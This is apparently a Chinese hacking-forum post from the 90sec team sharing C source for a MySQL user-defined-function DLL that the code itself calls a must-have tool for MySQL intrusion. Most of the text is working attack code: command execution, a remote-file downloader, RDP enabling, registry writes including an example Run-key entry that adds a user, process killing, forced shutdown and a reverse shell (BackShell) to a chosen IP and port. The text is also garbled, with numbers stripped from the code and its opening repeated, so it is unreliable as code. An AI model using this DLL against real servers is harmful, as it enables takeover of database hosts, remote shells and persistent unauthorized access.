udf.dll 源码
一点关于UDF的发散思路
Author:mer4en7y
Team:90sec
声明:UDF源码作者langouster
相信各位牛对UDF都不会陌生,看论坛叶总共享了一份UDF源码,以前一直没看过,于是看了看,写了这篇垃圾文章,再此抛砖引玉了,望大牛勿笑!
以cmdshell函数为例
cmdshell函数大家都不会陌生
GetSystemDirectory(ShellPath,MAX_PATH-); |
这里调用的是system32下的cmd,如果删除了那么函数就会失败,我们如何来发散一下呢
其实工具只是一个辅助,看下面一段简单代码:
这是一段用API函数添加普通用户的代码,我将原先的about函数稍微修改一下,替换为下面的代码
NET_API_STATUS ret=; |
udf.dll 源码
#include "stdafx.h"
#include "stdio.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <winsock.h>
#include <Urlmon.h>
#include "mysql.h"
#include "resource.h"
#include "mydebug.h"
#pragma comment(lib, "Urlmon.lib")
HANDLE g_module;
//---------------------------------------------------------- ---------------------------
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//-------------------------------------------------------------------------------- -----------------------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,
char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"执行CMD Shell函数.\r\n例:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
int RunStatus=;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[];
DWORD size=,len;
HANDLE hFile;
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"\\2351213.tmp");
cmdline=(char *)malloc(strlen(args->args[])+strlen(TempFilePath)+);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,,,,&si,&pi);
free(cmdline);
if(!RunStatus)
{
itoa(GetLastError(),temp,);
sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(pi.hProcess,);
//获得结果
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+);
ReadFile(hFile,initid->ptr,size+,&len,NULL);
(initid->ptr)[size]='\0'
strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
}
(*length)=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"下载者函数\r\n例:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hFile;
char path[MAX_PATH];
strcpy(path,(args->args)[]);
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
if(URLDownloadToFile(NULL,(args->args)[],path,,)==S_OK)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"下载文件成功(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count== ||(args->arg_count== && args->arg_type[]==INT_RESULT)))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.\r\n例:select open3389([端口]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\457391.exe");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,,,,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(pi.hProcess,);
DeleteFile(path);
//改端口
if(args->arg_count!= && args->arg_type[]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
DWORD port=*((long long *) args->args[]);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n修改终端服务端口失败.");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"读注册表函数.\r\n例:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\Services\\\\W3SVC\\\\Parameters\\\\Virtual Roots\",\"/\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
DWORD a,b,c;
BYTE bytere[];
HKEY key,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(key,(args->args)[],,,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[],,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
memset(initid->ptr,,);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表值\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表项\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"写注册表函数.\r\n例:select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion
\\\\Run\",\"adduser\",\"REG_SZ\",\"cmd.exe /c net user langouster langouster /add\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HKEY key,hkey;
DWORD dwDisposition,ktype;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(strcmp("REG_BINARY",(args->args)[])==)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[])==)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[])==)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[])==)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[])==)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[])==)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[])==)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[])==)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表值类型:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(hkey,(args->args)[],,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[],,ktype,(BYTE *)(args->args)[],lstrlen((args->args)[])+))
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表失败,可能是您的权限不够\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCloseKey(key);
}
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || (strcmp((args->args)[],"help")==))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"结束进程函数.\r\n例:select KillProcess(\"进程名 或 进程ID(十进制)\");\r\n程序目前还不能结束系统进程.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[];
PROCESSENTRY32 pe;
strcpy(ProcessName,(args->args)[]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,);
if(stricmp(pe.szExeFile,ProcessName)== || stricmp(tempchar,ProcessName)==)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
if(processid==)
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"找不到进程%s,请确认进程是否存在!",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程成功终止.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程终止失败,您的权限可能不足.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"枚举进程函数.\r\n例:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=;
PROCESSENTRY32 pe;
char tempchar[];
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,pe.szExeFile);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern "C" __declspec(dllexport)my_bool WindowsExit_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *WindowsExit(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"关机重启注销函数.\r\n例:select WindowsExit(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得进程访问信令出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
token.PrivilegeCount = ;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &token.Privileges[].Luid);
token.Privileges[].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,,&token, sizeof(token),,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得关机令牌出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
if(stricmp(args->args[],"logoff")==)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[],"shutdown")==)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[],"reboot")==)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(+strlen(args->args[]));
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"未知的参数%s,期望为logoff、shutdown、reboot中的一个.\r\n",args->args[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"成功执行.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"执行失败,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void WindowsExit_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern "C" __declspec(dllexport)my_bool BackShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *BackShell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=INT_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"反弹shell.\r\n例:select BackShell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\347win.exe");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-);
strcat(path,"\\cmd.exe");
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[],*((long long *) args->args[]));
if(WinExec(cmd,SW_HIDE)>)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行失败\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void BackShell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
strcat(initid->ptr,"mysql 入侵必备dll 版本1.0.0.1\r\n\r\n");
strcat(initid->ptr,"程序经多次测试,不太可能会造成MYSQL假死.\r\n");
strcat(initid->ptr,"注意:要使用本dll你必须有对mysql的insert和delete权限以创建和删除函数。\r\n\r\n");
strcat(initid->ptr,"使用方法:\r\n");
strcat(initid->ptr,"创建函数:create function 函数名(区分大小写) returns string soname \"dll名\" (注意路径);\r\n");
strcat(initid->ptr,"删除函数:delete function 函数名;\r\n");
strcat(initid->ptr,"使用函数:select 函数名(参数列表);获取参数信息可使用select 函数名(\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"本dll包含的函数:\r\n");
strcat(initid->ptr,"cmdshell 执行cmd;\r\n");
strcat(initid->ptr,"downloader 下载者,到网上下载指定文件并保存到指定目录;\r\n");
strcat(initid->ptr,"open3389 通用开3389终端服务,可指定端口(不改端口无需重启);\r\n");
一点关于UDF的发散思路
Author:mer4en7y
Team:90sec
声明:UDF源码作者langouster
相信各位牛对UDF都不会陌生,看论坛叶总共享了一份UDF源码,以前一直没看过,于是看了看,写了这篇垃圾文章,再此抛砖引玉了,望大牛勿笑!
以cmdshell函数为例
cmdshell函数大家都不会陌生
GetSystemDirectory(ShellPath,MAX_PATH-); |
这里调用的是system32下的cmd,如果删除了那么函数就会失败,我们如何来发散一下呢
其实工具只是一个辅助,看下面一段简单代码:
这是一段用API函数添加普通用户的代码,我将原先的about函数稍微修改一下,替换为下面的代码
NET_API_STATUS ret=; |
udf.dll 源码
#include "stdafx.h"
#include "stdio.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <winsock.h>
#include <Urlmon.h>
#include "mysql.h"
#include "resource.h"
#include "mydebug.h"
#pragma comment(lib, "Urlmon.lib")
HANDLE g_module;
//---------------------------------------------------------- ---------------------------
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//-------------------------------------------------------------------------------- -----------------------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,
char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"执行CMD Shell函数.\r\n例:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
int RunStatus=;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[];
DWORD size=,len;
HANDLE hFile;
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"\\2351213.tmp");
cmdline=(char *)malloc(strlen(args->args[])+strlen(TempFilePath)+);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,,,,&si,&pi);
free(cmdline);
if(!RunStatus)
{
itoa(GetLastError(),temp,);
sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(pi.hProcess,);
//获得结果
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+);
ReadFile(hFile,initid->ptr,size+,&len,NULL);
(initid->ptr)[size]='\0'
strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
}
(*length)=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
